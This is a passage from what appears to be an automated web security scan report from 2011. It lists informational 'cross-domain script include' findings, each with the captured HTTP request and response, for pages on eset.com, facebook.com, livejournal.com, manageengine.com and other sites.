<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

23.51. http://www.eset.com/us/business/products  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/business/products

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21066
Date: Mon, 25 Apr 2011 12:52:44 GMT
X-Varnish: 1310965243
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

23.52. http://www.eset.com/us/business/server-security/linux-file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/business/server-security/linux-file

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/business/server-security/linux-file HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.1.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738137976%3B%20gpv_pageName%3Dus/business/products%7C1303738137981%3B%20s_nr%3D1303736337984-Repeat%7C1335272337984%3B%20s_invisit%3Dtrue%7C1303738137988%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 17290
Date: Mon, 25 Apr 2011 12:58:48 GMT
X-Varnish: 1310977676
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>M
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

23.53. http://www.eset.com/us/home/smart-security  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home/smart-security

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=PC#1303736347554-914602.17#1304952767|check#true#1303743227|session#1303743154006-383984#1303745027; __utma=1.1646584456.1303732844.1303735979.1303743158.3; __utmc=1; __utmb=1.2.10.1303743158; s_pers=%20s_vnum%3D1335268844052%2526vn%253D3%7C1335268844052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%252C%255B%2527Other%252520Referrers-shopping.netsuite.com%2527%252C%25271303743170439%2527%255D%255D%7C1461595970439%3B%20s_visit%3D1%7C1303745017240%3B%20gpv_pageName%3Dus/new_homepage%7C1303745017242%3B%20s_nr%3D1303743217244-Repeat%7C1335279217244%3B%20s_invisit%3Dtrue%7C1303745017246%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedshopping.netsuite.comshopping.netsuite.com%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/new_homepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/home/smart-security%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25484
Date: Mon, 25 Apr 2011 15:17:24 GMT
X-Varnish: 555654660
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div style="padding:3px 0 20px 0">
   <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

23.54. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38877
Date: Mon, 25 Apr 2011 12:58:55 GMT
X-Varnish: 1310977884
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

23.55. http://www.eset.com/us/styles/store-new.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/styles/store-new.css

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/styles/store-new.css HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=4; expires=Fri, 24-Jun-2011 12:58:56 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26705
Date: Mon, 25 Apr 2011 12:58:56 GMT
X-Varnish: 1310977946
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

23.56. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d0bfa794%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff259c7ddf8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.150.41
X-Cnection: close
Date: Mon, 25 Apr 2011 12:52:48 GMT
Content-Length: 8179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/nogz-s5wETe.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/I8QAd_a7Pbh.js"></script>
...[SNIP]...

23.57. http://www.iveco-ptc.spb.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iveco-ptc.spb.ru
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?_openstat=ZGlyZWN0LnlhbmRleC5ydTszMjIwNzI7NDQzMjM3O3lhbmRleC5ydTpndWFyYW50ZWU HTTP/1.1
Host: www.iveco-ptc.spb.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:32:46 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=32638563fd192774612570ede2bad57a; path=/
Content-Length: 19221

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="
...[SNIP]...
<!-- Yandex.Metrika counter -->
<script src="//mc.yandex.ru/metrika/watch.js"
type="text/javascript">
</script>
...[SNIP]...

23.58. http://www.iveco-ptc.spb.ru/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iveco-ptc.spb.ru
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
Host: www.iveco-ptc.spb.ru
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00fce441a740fea86b906e1e933c9d1b

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:51:39 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 10399

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="
...[SNIP]...
<!-- Yandex.Metrika counter -->
<script src="//mc.yandex.ru/metrika/watch.js"
type="text/javascript">
</script>
...[SNIP]...

23.59. http://www.kronos.com/about/about-kronos.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kronos.com
Path:   /about/about-kronos.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/about-kronos.aspx HTTP/1.1
Host: www.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.kronos.com&SiteLanguage=1033; EktGUID=09aa79d0-673f-4609-b21e-7d9f4c9303d4; EkAnalytics=newuser; KRONOS_PUBLIC_US=oLbiTnpP6Si6kOk_DB7jFLNPiaC_Ce4w_I3BqCTnnw8TKWxdHCNaWZCIwvL0jHFbx-CJ_B7N8OAFc2s2P32q9I3r8vBB6mRCf7d9OEqeKNcwx6_MGW_2YzYMKIayfawPjXY5248iYocxSIZ_gu-1z8fF49vaXn80g8D6fyxIiYbbHFSz0; ASP.NET_SessionId=zoqftdbukjhn1b55hrsfjqnv; s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fcspersistslider1=6; s_cc=true; s_nr=1303738765059; s_invisit=true; s_lv=1303738765060; s_lv_s=First%20Visit; s_gpv_page=kronos%3Acustomer-support-login.aspx; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.3.10.1303738437; mbox=session#1303738433760-48782#1303741368|check#true#1303739568

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:51:44 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 50460


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="ctl00_ctl00_html1" xmlns="http://www.w3.org/1999/xhtml" lang="e
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=kronosinc"></script>
...[SNIP]...

23.60. http://www.livejournal.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.livejournal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:27:54 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-AWS-Id: ws24
ETag: "2973888db3f7f93cbba310f7bf86432d"
Vary: Accept-Encoding
Content-Language: en
X-Debug: USen gzip (null)
X-VWS-Id: bil1-varn03
X-Varnish: 307153447 307107722
Age: 292
Via: 1.1 varnish
Content-Length: 50232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<
...[SNIP]...
</div>
<script type="text/javascript" src="http://goods.adnectar.com/analytics/get_avia_js?api_version=3.0.0&site_key=a9aa425c93ef5dff380c&avia_version=0.8.16"></script>
...[SNIP]...
<div id='hello-world' style='text-align: left; font-size:0; line-height:0; height:0; overflow:hidden;'><script src="http://cdn.media6degrees.com/static/lj6387.js" type="text/javascript"></script>
...[SNIP]...

23.61. http://www.manageengine.com/me_partners.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manageengine.com
Path:   /me_partners.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /me_partners.html HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.12.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:56 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 05:36:02 GMT
ETag: "320aa-4a153000c3480"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 02 May 2011 12:13:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 204970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&amp;v=2.x&amp;key=ABQIAAAAG6seZC5-80EYpG3Eowtf_xRwM1sgXERs8XczokQgZjklQhF0XhQSa2xDB0fQgxu1i4QAlNSpXoJ36w"type="text/javascript"></script>
<script defer="defer" src="http://gmaps-utility-library.googlecode.com/svn/trunk/markerclusterer/1.0/src/markerclusterer.js"></script>
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

23.62. http://www.manageengine.com/products/applications_manager/application-performance-management.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manageengine.com
Path:   /products/applications_manager/application-performance-management.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/applications_manager/application-performance-management.html HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/download.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.9.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:38 GMT
Server: Apache
Last-Modified: Thu, 24 Mar 2011 09:22:06 GMT
ETag: "8fc7-49f3702cf4b80"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 02 May 2011 12:13:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 36807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

23.63. http://www.manageengine.com/products/security-manager/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manageengine.com
Path:   /products/security-manager/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.2.10.1303732848
If-None-Match: "d3ec-49f24fc659f40"
If-Modified-Since: Wed, 23 Mar 2011 11:51:49 GMT

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:11:53 GMT
Server: Apache
Last-Modified: Wed, 23 Mar 2011 11:51:49 GMT
ETag: "d3ec-49f24fc659f40"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 02 May 2011 12:11:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 54252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
